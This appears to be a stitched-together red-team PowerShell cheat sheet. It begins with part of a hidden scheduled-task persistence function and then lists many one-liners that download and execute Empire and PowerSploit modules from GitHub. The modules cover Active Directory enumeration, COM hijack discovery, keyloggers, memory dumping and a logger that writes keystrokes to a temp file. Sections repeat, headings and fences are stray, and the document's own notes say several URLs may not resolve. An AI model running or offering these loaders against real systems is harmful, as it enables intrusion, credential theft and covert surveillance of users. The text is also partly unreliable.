$Action = $Task.Actions.Create (0 )
$Action.Path = $Command
$Action.Arguments = $Argument
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition ($TaskName , $Task , 6 , " " , " " , 3 )
}
END {
Write-Output " [+] Process Completed"
}
}
function Convert-Date {
    <#
    .SYNOPSIS
    Formats a DateTime as the UTC "yyyy-MM-ddTHH:mm:ssZ" string Task Scheduler boundaries accept.

    .PARAMETER Date
    The instant to format. Converted to UTC first, so any Kind is acceptable.

    .OUTPUTS
    String. The "u" standard format is culture-invariant ("yyyy-MM-dd HH:mm:ssZ"); swapping
    its single space for "T" gives the ISO-8601-style form used by StartBoundary/EndBoundary.
    #>
    param (
        [datetime]$Date
    )
    PROCESS {
        $utc = $Date.ToUniversalTime()
        $utc.ToString("u").Replace(" ", "T")
    }
}
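# COM hijack discovery helpers from Empire.
# NOTE(review): both one-liners download and IEX-execute whatever is at the repo's current
# master HEAD, with no pinning or hash check. On an engagement, pin to a commit SHA and compare
# a hash of the downloaded text before executing it.
# Recommend Get-ComHijack
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-ComHijack.ps1);Get-ComHijack
# Recommend Get-ComHijackProperty
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-ComHijackProperty.ps1);Get-ComHijackProperty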
Red Teaming PowerShell Frameworks & Toolz
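# PowerView-style AD enumeration one-liners. Each Recommend / Not recommend pair is an
# alternative source for the same function: run one of the pair, not both.
# NOTE(review): every line downloads and IEX-executes the repo's current master HEAD with no
# pinning or hash check -- a supply-chain risk on a real engagement. Pin to a commit SHA and
# verify the downloaded text before executing it.
# NOTE(review): the per-function paths (Empire .../credentials/<Function>.ps1 and PowerSploit
# Recon/<Function>.ps1) do not match how either repo appears to ship PowerView (a single
# powerview.ps1 / PowerView.ps1); confirm each URL resolves before relying on it.
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetUser.ps1);Get-NetUser
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetUser.ps1);Get-NetUser
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetComputer.ps1);Get-NetComputer
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetComputer.ps1);Get-NetComputer
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetGroup.ps1);Get-NetGroup
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetGroup.ps1);Get-NetGroup
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetShare.ps1);Get-NetShare
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetShare.ps1);Get-NetShare
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetFileSystem.ps1);Get-NetFileSystem
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetFileSystem.ps1);Get-NetFileSystem
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetDomain.ps1);Get-NetDomain
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetDomain.ps1);Get-NetDomain
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetLocalGroup.ps1);Get-NetLocalGroup
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetLocalGroup.ps1);Get-NetLocalGroup
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetLoggedOn.ps1);Get-NetLoggedOn
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetLoggedOn.ps1);Get-NetLoggedOn
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetOU.ps1);Get-NetOU
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetOU.ps1);Get-NetOU
# Recommend Get-NetUserSession
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetUserSession.ps1);Get-NetUserSession
# Not recommend Get-NetUserSession
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetUserSession.ps1);Get-NetUserSession
# Recommend Get-NetGroupUser
# (no loader line was given for Get-NetGroupUser in the original listing)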
# ### Get-NetShare
```powershell
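# PowerView-style AD enumeration one-liners (continued). Each Recommend / Not recommend pair
# is an alternative source for the same function: run one of the pair, not both.
# NOTE(review): every line downloads and IEX-executes the repo's current master HEAD with no
# pinning or hash check -- a supply-chain risk on a real engagement. Pin to a commit SHA and
# verify the downloaded text before executing it.
# NOTE(review): the per-function paths (Empire .../credentials/<Function>.ps1 and PowerSploit
# Recon/<Function>.ps1) do not match how either repo appears to ship PowerView (a single
# powerview.ps1 / PowerView.ps1); confirm each URL resolves before relying on it.
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetShare.ps1);Get-NetShare
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetShare.ps1);Get-NetShare
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetFileSystem.ps1);Get-NetFileSystem
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetFileSystem.ps1);Get-NetFileSystem
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetUser.ps1);Get-NetUser
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetUser.ps1);Get-NetUser
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetDomain.ps1);Get-NetDomain
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetDomain.ps1);Get-NetDomain
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetComputer.ps1);Get-NetComputer
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetComputer.ps1);Get-NetComputer
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetGroup.ps1);Get-NetGroup
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetGroup.ps1);Get-NetGroup
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetLocalGroup.ps1);Get-NetLocalGroup
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetLocalGroup.ps1);Get-NetLocalGroup
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetLoggedOn.ps1);Get-NetLoggedOn
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetLoggedOn.ps1);Get-NetLoggedOn
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetOU.ps1);Get-NetOU
# Not recommend
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetOU.ps1);Get-NetOU
# Recommend Get-NetUserSession
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetUserSession.ps1);Get-NetUserSession
# Not recommend Get-NetUserSession
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetUserSession.ps1);Get-NetUserSession
# Recommend Get-NetDomainController
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Get-NetDomainController.ps1);Get-NetDomainController
# Not recommend Get-NetDomainController
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Get-NetDomainController.ps1);Get-NetDomainController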
External PowerShell t00lize
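# Keystroke capture and memory-dump loaders. Each line downloads a script and runs it in the
# current session; pick one, they are alternatives.
# NOTE(review): only the gist URL is pinned to a revision; every other line executes the repo's
# current master HEAD unverified. Pin to a commit SHA and hash-check the text before IEX.
# Recommend
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-Keystrokes.ps1);Get-Keystrokes
iex (iwr https://gist.githubusercontent.com/andreafortuna/c807ffd46820c60c78ee955a19dc1f80/raw/bc48844fcc61ca52855caf65bcd9f17960e468bd/KeyLogger.ps1);Test-KeyLogger
iex (iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Keylogger.ps1);Keylogger
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1);Out-Minidump
iex (iwr https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Keylogger.ps1);Invoke-Keylogger
# Not recommend
iex (iwr https://raw.githubusercontent.com/vacmf/powershell-scripts/master/powershell-keylogger.ps1);KeyLog
iex (iwr https://raw.githubusercontent.com/lazywinadmin/PowerShell/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1);Start-KeyLogger
# Spawns a child powershell.exe with the loader on its command line (visible in 4688 / Sysmon 1
# command-line logging). The capture file lands in a predictable, broadly readable location.
powershell.exe "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1'); Get-Keystrokes -LogPath C:\windows\temp\key.log -Timeout 20"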